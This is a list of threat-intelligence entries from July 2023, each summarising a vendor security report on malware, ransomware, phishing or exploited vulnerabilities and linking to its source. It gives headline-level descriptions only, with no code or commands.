Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf
2023-07-27
Exploiting_of_the_search_ms_URI_Protocol_Handler
LOW
+
Intel Source:
Trellix
Intel Name:
Exploiting_of_the_search_ms_URI_Protocol_Handler
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
This article discusses the use of malicious payloads, such as AsyncRAT and Remcos RAT, by attackers to gain remote control over an infected system. It also covers the use of the “search” / “search-ms” URI protocol handler to launch attacks using a variety of file types, and how to disable this protocol handler. Additionally, it provides configuration information for AsyncRAT, including two IP addresses, six ports, a default botnet, a version number, and various settings.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
2023-07-27
The_Analysis_of_Amadey_Threat
LOW
+
Intel Source:
Splunk
Intel Name:
The_Analysis_of_Amadey_Threat
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
The Amadey Trojan Stealer, an active and prominent malware, first emerged on the cybersecurity landscape in 2018 and has maintained a persistent botnet infrastructure ever since. Several campaigns have used this malware.
Source: https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html
2023-07-27
Tomcat_attacked_by_Mirai_Malware_and_beyond
LOW
+
Intel Source:
Aquasec
Intel Name:
Tomcat_attacked_by_Mirai_Malware_and_beyond
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
This article discusses the misconfiguration of Apache Tomcat, the impact of the malware 'l4sd4sx64', and the prevalence of Apache Tomcat in cloud, big data, and website development. It also provides an analysis of the attacks against Tomcat server honeypots over a two-year period, including the detection of a web shell hidden in a WAR file, the execution of a shell script, and the execution of the Mirai malware.
Source: https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware
2023-07-27
PurpleFox_Loader_Distributing_via_MS_SQL_Server
LOW
+
Intel Source:
ASEC
Intel Name:
PurpleFox_Loader_Distributing_via_MS_SQL_Server
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
ASEC researchers have discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners.
Source: https://asec.ahnlab.com/en/55492/
2023-07-27
Lazarus_Threat_Group_Attacking_Windows_Servers
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Lazarus_Threat_Group_Attacking_Windows_Servers
Date of Scan:
2023-07-27
Impact:
MEDIUM
Summary:
ASEC researchers have discovered that Lazarus, a threat group deemed to be nationally funded, is attacking Windows Internet Information Service (IIS) web servers and using them as distribution points for their malware.
Source: https://asec.ahnlab.com/en/55369/
2023-07-27
The_Investigation_of_Cloud_Compute_Resource_Abuse
LOW
+
Intel Source:
Microsoft
Intel Name:
The_Investigation_of_Cloud_Compute_Resource_Abuse
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
Microsoft researchers have observed cryptojacking attacks targeting organizations that left the victims with more than $300,000 in computing fees.
Source: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
2023-07-27
Casbaneiro_Infection_Chain_is_Back
LOW
+
Intel Source:
Sygnia
Intel Name:
Casbaneiro_Infection_Chain_is_Back
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
Sygnia researchers have observed that threat actors behind the Casbaneiro campaign are still active to this day, with some changes over the years in their attack chain, C2 infrastructure, and TTPs. The threat actors are still making effective use of spear-phishing attack to initiate their infection chain, and still appear to be focused on Latin American targets.
Source: https://blog.sygnia.co/breaking-down-casbaneiro-infection-chain-part2
2023-07-27
Jade_Sleet_Storm_0954_Social_Engineering_Campaign
LOW
+
Intel Source:
GitHub Blog
Intel Name:
Jade_Sleet_Storm_0954_Social_Engineering_Campaign
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
GitHub has observed a Jade Sleet social engineering campaign that targets employees of technology firms, particularly those connected to the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Jade Sleet (Storm-0954) is an activity group originating from North Korea that specializes in targeting cryptocurrency-related organizations. They use a range of tactics, such as developing applications that look like legitimate cryptocurrency apps, to spread their attacks. Jade Sleet has used the multi-platform targeted malware framework (MATA) and the Electron framework to create implants for both Microsoft Windows and Mac-based systems.
Source: https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/
2023-07-27
In_depth_Campaign_Analysis_of_QakBot
LOW
+
Intel Source:
Zscaler
Intel Name:
In_depth_Campaign_Analysis_of_QakBot
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
Researchers from Zscaler have conducted in-depth investigations to uncover the various attack chains employed by Qakbot. In this research, they delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods.
Source: https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis
2023-07-27
Diving_Deep_into_Mallox_Ransomware
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Diving_Deep_into_Mallox_Ransomware
Date of Scan:
2023-07-27
Impact:
MEDIUM
Summary:
Unit 42 researchers have observed an uptick of Mallox ransomware activities with an increase of almost 174% compared to the previous year exploiting MS-SQL servers to distribute the ransomware. Mallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft Windows systems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims' networks.
Source: https://unit42.paloaltonetworks.com/mallox-ransomware/
2023-07-27
Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector
LOW
+
Intel Source:
Checkmarx
Intel Name:
Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
The banking sector is facing targeted open-source software supply chain attacks. Malicious actors exploit vulnerabilities in open-source packages, utilizing advanced techniques and deceptive tactics. Traditional controls fall short, necessitating proactive security measures throughout the Software Development Lifecycle (SDLC). Collaboration is key to strengthen defenses against these evolving threats. Checkmarx's Supply Chain Intelligence offers protection and ongoing tracking.
Source: https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/
2023-07-27
Attack_Tactics_Against_Industrial_Organizations
LOW
+
Intel Source:
ICS CERT
Intel Name:
Attack_Tactics_Against_Industrial_Organizations
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
Researchers from Kaspersky ICS CERT have looked at a number of assaults on commercial targets in Eastern Europe. The attackers' goal in the attacks was to create an ongoing conduit for data exfiltration, including data from air-gapped systems. Based on the commonalities between these operations and other efforts that have been previously studied (such as ExCone and DexCone), including the use of FourteenHi variants, particular TTPs, and the scale of the attack.
Source: https://ics-cert.kaspersky.com/publications/reports/2023/07/20/common-ttps-of-attacks-against-industrial-organizations-implants-for-remote-access/
2023-07-27
Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio
LOW
+
Intel Source:
Cyble
Intel Name:
Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
Cyble researchers have uncovered a deceitful installer masquerading as an authentic Microsoft Visual Studio installer delivering a Cookie Stealer. This stealer is specifically designed to infiltrate and extract sensitive information stored in browser cookies, allowing attackers to compromise user accounts and invade privacy.
Source: https://blog.cyble.com/2023/07/25/threat-actor-targeting-developers-via-trojanized-ms-visual-studio/
2023-07-27
Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities
MEDIUM
Intel Source:
Fortinet
Intel Name:
Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities
Date of Scan:
2023-07-27
Impact:
MEDIUM
Summary:
Cl0p ransomware, operated by the FIN11 threat group, has been a persistent and financially motivated menace since early 2019. This malicious software targets organizations in North America and Europe, encrypting files and exfiltrating sensitive data. Recent attacks have exploited critical vulnerabilities in software, including the MOVEit Transfer SQL injection flaw. The ransomware group demands payment in exchange for file decryption and to prevent the public exposure of stolen information.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-cl0p
2023-07-27
A_Deceptive_and_Evolving_Malware_Tool
LOW
Intel Source:
Cyfirma
Intel Name:
A_Deceptive_and_Evolving_Malware_Tool
Date of Scan:
2023-07-27
Impact:
LOW
Summary:
Cyfirma has identified a new threat in the cybersecurity landscape: Attacker-Crypter. This tool allows cybercriminals to encrypt, obfuscate, and manipulate malicious code, evading detection by security tools and antivirus software. The freely available tool offers various features to enhance malware capabilities, including process injection, debugger evasion, and network communication.
Source: https://www.cyfirma.com/outofband/attacker-crypter-v0-9-unveiling-a-powerful-tool-for-evading-antivirus-and-enhancing-malware-capabilities/
2023-07-27
The_Deep_Investigation_of_JumpCloud_System_Breach
MEDIUM
Intel Source:
Mandiant
Intel Name:
The_Deep_Investigation_of_JumpCloud_System_Breach
Date of Scan:
2023-07-27
Impact:
MEDIUM
Summary:
Mandiant researchers have investigated the JumpCloud system breach and its impact on customers. Mandiant attributed these intrusions to UNC4899, a Democratic People's Republic of Korea (DPRK)-nexus actor, with a history of targeting companies within the cryptocurrency vertical.
Source: https://www.mandiant.com/resources/blog/north-korea-supply-chain
2023-07-26
The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script
MEDIUM
Intel Source:
Avast
Intel Name:
The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script
Date of Scan:
2023-07-26
Impact:
MEDIUM
Summary:
In a recent rise in malware activity, Avast researchers found malicious AutoHotkey scripts that launched the HotRat malware on victims' PCs bundled with illicit software. This malware spreads via open repositories, with URLs being shared on social media and online discussion boards.
Source: https://decoded.avast.io/martinchlumecky/hotrat-the-risks-of-illegal-software-downloads-and-hidden-autohotkey-script-within/
2023-07-26
JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity
MEDIUM
Intel Source:
SentinelOne
Intel Name:
JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity
Date of Scan:
2023-07-26
Impact:
MEDIUM
Summary:
SentinelOne shared the details after its investigation and attributed this attack to an unnamed “sophisticated nation-state sponsored threat actor”. Additionally, updated IOCs have been released, and researchers associated the cluster of threat activity with a North Korean state-sponsored APT. The IOCs are linked to a wide variety of activity that SentinelOne attributes to the DPRK, overall centred on the supply chain targeting approach seen in previous campaigns.
Source: https://www.sentinelone.com/labs/jumpcloud-intrusion-attacker-infrastructure-links-compromise-to-north-korean-apt-activity/?utm_source=substack&utm_medium=email
2023-07-26
Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations
MEDIUM
Intel Source:
Eclecticiq
Intel Name:
Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations
Date of Scan:
2023-07-26
Impact:
MEDIUM
Summary:
Researchers at EclecticIQ have discovered a spearphishing campaign that uses vulnerable Zimbra and Roundcube email servers to target governmental institutions. The campaign began in January 2023 and has primarily targeted Ukrainian government organizations; however, it has also targeted Spain, Indonesia, and France.
Source: https://blog.eclecticiq.com/spearphishing-campaign-targets-zimbra-webmail-portals-of-government-organizations
2023-07-26
Scammers_Targeting_Universities_With_Bioscience_Lures
LOW
Intel Source:
Proofpoint
Intel Name:
Scammers_Targeting_Universities_With_Bioscience_Lures
Date of Scan:
2023-07-26
Impact:
LOW
Summary:
Researchers from Proofpoint observed a campaign in late May 2023 that targeted university students in North America using a variety of job-themed email lures. The emails claimed to be from several different organizations, the bulk of which were involved in the biosciences, healthcare, and biotechnology, along with a few unrelated ones. The operation continued until June 2023.
Source: https://www.proofpoint.com/us/blog/threat-insight/job-scams-using-bioscience-lures-target-universitie
2023-07-26
The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect
LOW
Intel Source:
PaloAlto
Intel Name:
The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect
Date of Scan:
2023-07-26
Impact:
LOW
Summary:
Cloud researchers at Unit 42 have found a new peer-to-peer (P2P) worm that they named P2PInfect. This worm is capable of cross-platform infections and is written in the highly scalable and cloud-friendly programming language Rust. It targets Redis, a well-known open-source database application that is frequently used in cloud environments.
Source: https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/
2023-07-26
Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970
LOW
Intel Source:
Cyfirma
Intel Name:
Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970
Date of Scan:
2023-07-26
Impact:
LOW
Summary:
The CYFIRMA research team has observed Poop69 ransomware appearing in the wild, and shortly after that, another ransomware named BIG HEAD emerged, thought to originate from the same threat actor; BIG HEAD has become popular recently due to its fake Windows update method.
Source: https://www.cyfirma.com/outofband/dev-0970-storm-0970-the-threat-actors-behind-big-head-and-poop69-ransomware/
2023-07-26
Zyxel_Vulnerability_Targeted_by_DDoS_Botnets
MEDIUM
Intel Source:
Fortinet
Intel Name:
Zyxel_Vulnerability_Targeted_by_DDoS_Botnets
Date of Scan:
2023-07-26
Impact:
MEDIUM
Summary:
Researchers from FortiGuard have discovered the spread of many DDoS botnets that are exploiting the Zyxel vulnerability (CVE-2023-28771). The vulnerability is a command injection bug affecting several firewall models that allows an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the targeted device.
Source: https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771
2023-07-25
Outlook_Vulnerability_and_Clever_Attacker_Tactics
LOW
Intel Source:
Securelist
Intel Name:
Outlook_Vulnerability_and_Clever_Attacker_Tactics
Date of Scan:
2023-07-25
Impact:
LOW
Summary:
Securelist shared their analysis of the CVE-2023-23397 vulnerability in Microsoft Outlook for Windows, which allowed attackers to leak Net-NTLMv2 hashes by sending malicious objects. Samples exploiting this flaw targeted various entities from March 2022 to March 2023. Attackers used compromised ISP routers for hosting fake SMB servers.
Source: https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/
2023-07-25
Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware
Date of Scan:
2023-07-25
Impact:
MEDIUM
Summary:
CERT-UA researchers have discovered that, in addition to the use of XSLT (Extensible Stylesheet Language Transformations) and COM hijacking, the specificity of CAPIBAR is the presence of a server part, which is typically installed on infected MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DSC) PowerShell tool, effectively converting a legitimate server into a malware control center.
Source: https://cert.gov.ua/article/5213167
2023-07-25
New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates
LOW
Intel Source:
Malwarebytes
Intel Name:
New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates
Date of Scan:
2023-07-25
Impact:
LOW
Summary:
Researchers from Malwarebytes have observed a new campaign called FakeSG that is distributing the NetSupport RAT through hacked WordPress websites. It uses fake browser update templates to deceive users. The payload is delivered via Internet shortcuts or zipped downloads.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/07/socgholish-copycat-delivers-netsupport-rat
2023-07-25
DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms
LOW
Intel Source:
JPCERT/CC
Intel Name:
DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms
Date of Scan:
2023-07-25
Impact:
LOW
Summary:
JPCERT/CC has reported that DangerousPassword, a targeted attack group, is targeting developers at cryptocurrency exchange businesses on Windows, macOS, and Linux. The group uses Python and Node.js malware to infect systems. The malware downloads and executes MSI files (Windows) and Python files (macOS, Linux) from external sources, communicating with a C2 server every minute.
Source: https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html
2023-07-25
Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks
LOW
Intel Source:
Fortinet
Intel Name:
Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks
Date of Scan:
2023-07-25
Impact:
LOW
Summary:
FortiGate researchers have observed threat actors using the new '.ZIP' top-level domain (TLD) to launch sophisticated phishing attacks. These domains can trick users into thinking they are downloading files when they are actually visiting malicious websites.
Source: https://www.fortinet.com/blog/industry-trends/threat-actors-add-zip-domains-to-phishing-arsenals
2023-07-25
Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers
MEDIUM
Intel Source:
HP Labs
Intel Name:
Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers
Date of Scan:
2023-07-25
Impact:
MEDIUM
Summary:
Researchers from HP Labs have observed two major malware campaigns delivering Vidar Stealer and IcedID, both of which use malvertising and imitate well-known software. They have also seen other families distributed using this method, including BatLoader and Rhadamanthys Stealer, indicating the growing popularity of this delivery mechanism among threat actors.
Source: https://threatresearch.ext.hp.com/adverts-mimicking-popular-software-leads-to-malware/?web_view=true
2023-07-25
BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format
MEDIUM
Intel Source:
Checkpoint
Intel Name:
BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format
Date of Scan:
2023-07-25
Impact:
MEDIUM
Summary:
Check Point Research (CPR) conducted an analysis of a new malware strain called BundleBot, which is spreading covertly. BundleBot uses the dotnet bundle (single-file), self-contained format, making static detection challenging. The malware is commonly distributed via Facebook Ads and compromised accounts, masquerading as legitimate program utilities, AI tools, and games.
Source: https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/
2023-07-24
The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased
LOW
Intel Source:
Cofense
Intel Name:
The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased
Date of Scan:
2023-07-24
Impact:
LOW
Summary:
Researchers from Cofense have observed developments in the phishing and email security landscape. The use of HTML attachments in malicious phishing attempts has increased significantly, by 168% and 450% respectively, compared to Q1 and Q2 of the preceding two years.
Source: https://cofense.com/blog/html-attachments-used-in-malicious-phishing-campaigns/
2023-07-24
Modified_Sardonic_Backdoor_by_FIN8_Group
LOW
Intel Source:
Symantec
Intel Name:
Modified_Sardonic_Backdoor_by_FIN8_Group
Date of Scan:
2023-07-24
Impact:
LOW
Summary:
Symantec researchers have found evidence of the financially motivated threat actor known as FIN8 employing a "revamped" variation of the Sardonic backdoor to spread the BlackCat ransomware.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor
2023-07-24
NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows
LOW
Intel Source:
Sonatype
Intel Name:
NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows
Date of Scan:
2023-07-24
Impact:
LOW
Summary:
Sonatype's automated malware detection systems discovered sonatype-2023-2950, a malicious PyPI package with the name "feur," which has since been taken down.
Source: https://blog.sonatype.com/quoi...-feur-from-meme-to-malware-pypi-package-targets-windows-with-nullrat-info-stealer
2023-07-24
Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead
LOW
Intel Source:
Permiso
Intel Name:
Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead
Date of Scan:
2023-07-24
Impact:
LOW
Summary:
Researchers from Permiso have observed attackers using an agile approach to mass cloud credential harvesting and crypto mining. The attackers developed and deployed incremental iterations of their malware, targeting multiple cloud services. The campaign includes multi-cloud support, possible German-speaking actors, and hosting on Nice VPS.
Source: https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/?utm_source=substack&utm_medium=email
2023-07-24
Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively
LOW
Intel Source:
Rapid7
Intel Name:
Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively
Date of Scan:
2023-07-24
Impact:
LOW
Summary:
Researchers from Rapid7 have discovered that criminals are actively taking advantage of two ColdFusion flaws to circumvent authentication, remotely execute commands, and install webshells on vulnerable servers. Threat actors are combining exploits for the critical remote code execution vulnerability CVE-2023-38203 and the access control bypass vulnerability CVE-2023-29298.
Source: https://www.rapid7.com/blog/post/2023/07/17/etr-active-exploitation-of-multiple-adobe-coldfusion-vulnerabilities/
2023-07-23
JumpCloud_had_a_breach_by_state_backed_APT_hacking_group
MEDIUM
Intel Source:
BleepingComputer, JumpCloud
Intel Name:
JumpCloud_had_a_breach_by_state_backed_APT_hacking_group
Date of Scan:
2023-07-23
Impact:
MEDIUM
Summary:
US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. The company discovered the incident on June 27, one week after the attackers breached its systems via a spear-phishing attack. On July 5, JumpCloud discovered "unusual activity in the commands framework for a small set of customers" while investigating the attack and analyzing logs for signs of malicious activity.
Source: https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/ https://jumpcloud.com/support/july-2023-iocs
2023-07-23
The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access
LOW
Intel Source:
Microsoft
Intel Name:
The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access
Date of Scan:
2023-07-23
Impact:
LOW
Summary:
Earlier this month, Microsoft shared detailed information about a malicious campaign by the threat actor Storm-0558 that targeted customer email. Microsoft continued its investigation into this incident and deployed defense in depth to harden all systems involved; additionally, it is providing a deeper analysis of the observed actor techniques for obtaining unauthorized access to email data, the tools used, and unique infrastructure characteristics.
Source: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
2023-07-23
AWS_Amplify_Hosted_Phishing_Campaigns
LOW
Intel Source:
Netskope
Intel Name:
AWS_Amplify_Hosted_Phishing_Campaigns
Date of Scan:
2023-07-23
Impact:
LOW
Summary:
Over the last couple of months, Netskope Threat Labs researchers observed an increase in traffic to phishing pages hosted on AWS Amplify. These attacks have been targeting victims across different segments, led by the technology and finance verticals.
Source: https://www.netskope.com/de/blog/aws-amplify-hosted-phishing-campaigns-abusing-telegram-static-forms
2023-07-22
A_complex_phishing_operation_Manipulated_Caiman
LOW
Intel Source:
Perception Point
Intel Name:
A_complex_phishing_operation_Manipulated_Caiman
Date of Scan:
2023-07-22
Impact:
LOW
Summary:
Perception Point investigated a complex phishing operation called “Manipulated Caiman”. The threat actor was named after one of the files analyzed, which contains the words “Loader Manipulado” in its PDB path, and the attacker’s origin appears to be Latin America. Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, an SMTP brute-force client, a malicious extension installer, a net info checker, and a spammer client.
Source: https://perception-point.io/blog/manipulated-caiman-the-sophisticated-snare-of-mexicos-banking-predators-technical-edition/
2023-07-22
The_delivery_of_BlotchyQuasar_malware
MEDIUM
Intel Source:
Security Intelligence
Intel Name:
The_delivery_of_BlotchyQuasar_malware
Date of Scan:
2023-07-22
Impact:
MEDIUM
Summary:
IBM Security X-Force discovered some phishing emails leading to packed executable files delivering malware called BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments.
Source: https://securityintelligence.com/posts/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/
2023-07-21
The_Delivery_of_Sorillus_RAT
LOW
Intel Source:
eSentire
Intel Name:
The_Delivery_of_Sorillus_RAT
Date of Scan:
2023-07-21
Impact:
LOW
Summary:
eSentire researchers have identified Sorillus RAT and a phishing page being delivered via HTML-smuggled files and links hosted on Google’s Firebase Hosting service.
Source: https://www.esentire.com/blog/google-firebase-hosting-abused-to-deliver-sorillus-rat-phishing-page
2023-07-20
M365_Phishing_Email_Analysis
LOW
Intel Source:
Vadesecure
Intel Name:
M365_Phishing_Email_Analysis
Date of Scan:
2023-07-20
Impact:
LOW
Summary:
Vade’s researchers have detected a new Microsoft 365 phishing attack and analyzed an email containing a malicious HTML attachment.
Source: https://www.vadesecure.com/en/blog/m365-phishing-email-analysis-eevilcorp
2023-07-20
Diving_Deep_into_Rancoz_Ransomware
LOW
Intel Source:
Fortinet
Intel Name:
Diving_Deep_into_Rancoz_Ransomware
Date of Scan:
2023-07-20
Impact:
LOW
Summary:
FortiGate researchers note that the Rancoz ransomware first came to the public's attention a few months back. However, it is important to raise awareness of this ransomware variant, as the most recent victim posted on its TOR data leak site dates back just a few weeks, to mid-June.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-rancoz
2023-07-20
A_High_Evasive_Blank_Grabber_Returns
LOW
Intel Source:
Cyfirma
Intel Name:
A_High_Evasive_Blank_Grabber_Returns
Date of Scan:
2023-07-20
Impact:
LOW
Summary:
CYFIRMA researchers have identified an infostealer builder known as ‘Blank Grabber’. It was released in 2022; since then, it has been frequently updated, with 85 contributions to the project in the last month alone. The infostealer targets Windows operating systems and possesses a wide range of capabilities aimed at stealing sensitive information from unsuspecting users.
Source: https://www.cyfirma.com/outofband/blank-grabber-returns-with-high-evasiveness/
2023-07-20
The_Analysis_of_HKLEAKS_Campaign
LOW
Intel Source:
Citizenlab
Intel Name:
The_Analysis_of_HKLEAKS_Campaign
Date of Scan:
2023-07-20
Impact:
LOW
Summary:
Researchers from Citizen Lab have conducted a forensic analysis of the entire identifiable digital footprint of the HKLEAKS campaign. In August 2019, at the height of the Anti-Extradition Bill protests that rocked Hong Kong, a series of websites branded “HKLEAKS” began surfacing on the web. Claiming to be run by anonymous citizens, they systematically exposed (“doxxed”) the personally identifiable information of protesters, journalists, and other individuals perceived as affiliated with the protest movement.
Source: https://citizenlab.ca/2023/07/hkleaks-covert-and-overt-online-harassment-tactics-to-repress-the-2019-hong-kong-protests/
2023-07-19
WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable
LOW
Intel Source:
CERT-HR
Intel Name:
WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
CERT-HR researchers report on 'Ultimate Member', a plugin that allows registration and management of communities on WordPress sites. The critical vulnerability (CVE-2023-3460) has been rated 9.8. All versions of the plugin, which has more than 200,000 active installations, are vulnerable.
Source: https://www.cert.hr/otkrivena-je-kriticna-ranjivost-ultimate-member-wordress-dodatka-zakrpe-nema/?utm_source=rss&utm_medium=rss&utm_campaign=otkrivena-je-kriticna-ranjivost-ultimate-member-wordress-dodatka-zakrpe-nema
2023-07-19
Malicious_extensions_in_Chrome_Web_Store
LOW
Intel Source:
Kaspersky, Palant
Intel Name:
Malicious_extensions_in_Chrome_Web_Store
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
The subpage of the Kaspersky official blog discusses the discovery of malicious extensions in the Chrome Web Store with a total of 87 million downloads. The most popular extension, "Autoskip for Youtube," had nine million downloads. Users are advised to check and uninstall any malicious extensions as they can access user data.
Source: https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/ https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
2023-07-19
Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub
LOW
Intel Source:
Uptycs
Intel Name:
Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
Cybersecurity researchers continue to be targeted by malicious actors: a proof-of-concept (PoC) exploit has been discovered on GitHub that conceals a backdoor with a "crafty" persistence method.
Source: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
2023-07-19
DomainNetworks_Mail_Scam
LOW
Intel Source:
KrebsonSecurity
Intel Name:
DomainNetworks_Mail_Scam
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
KrebsOnSecurity has identified DomainNetworks as a fraudulent company behind a snail mail scam targeting domain owners. Its true operators remain unidentified, despite connections to thedomainsvault.com and UBSagency. These scams trick organizations into paying for unnecessary services.
Source: https://krebsonsecurity.com/2023/07/whos-behind-the-domainnetworks-snail-mail-scam/?replytocom=587051
2023-07-19
New_Invitation_From_APT29_to_Use_CCleaner
LOW
Intel Source:
Lab52
Intel Name:
New_Invitation_From_APT29_to_Use_CCleaner
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
Researchers from Lab52 have seen a phishing campaign that purports to be an invitation from the Norwegian embassy to a party. This particular "invitation" is an .svg file. When the file is opened, a script runs that downloads and mounts an ISO file containing the next infection stage. In this way, the .svg file serves as an HTML smuggler, infecting the target and proceeding to the subsequent stage.
Source: https://lab52.io/blog/2344-2/
2023-07-19
The_activities_of_the_UAC_0010_group_as_of_July_2023
LOW
Intel Source:
CERT-UA
Intel Name:
The_activities_of_the_UAC_0010_group_as_of_July_2023
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
The continuous accumulation and analysis of data on cyber incidents allows us to conclude that one of the most persistent cyber threats is UAC-0010 (Armageddon), the activities of which are carried out by former "officers" of the State Security Service of Crimea, who in 2014 betrayed their military oath and began to serve the FSB of Russia. The main task of the group is cyberespionage against the security and defense forces of Ukraine. At the same time, we know at least one case of destructive activity at an information infrastructure facility.
Source: https://cert.gov.ua/article/5160737
2023-07-19
Enterprise_Applications_Honeypot_revealed_some_findings
LOW
Intel Source:
Trustwave
Intel Name:
Enterprise_Applications_Honeypot_revealed_some_findings
Date of Scan:
2023-07-19
Impact:
LOW
Summary:
Trustwave researchers have established a network of honeypot sensors across six countries: Russia, Ukraine, Poland, the UK, China, and the United States. They also present the most intriguing findings from their research into exposed, vulnerable enterprise applications, such as Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian Bitbucket, and F5 BIG-IP.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-enterprise-applications-honeypot-unveiling-findings-from-six-worldwide-locations/
2023-07-18
Old_Blackmoon_Trojan_NEW_Monetization_Approach
LOW
Intel Source:
Rapid7
Intel Name:
Old_Blackmoon_Trojan_NEW_Monetization_Approach
Date of Scan:
2023-07-18
Impact:
LOW
Summary:
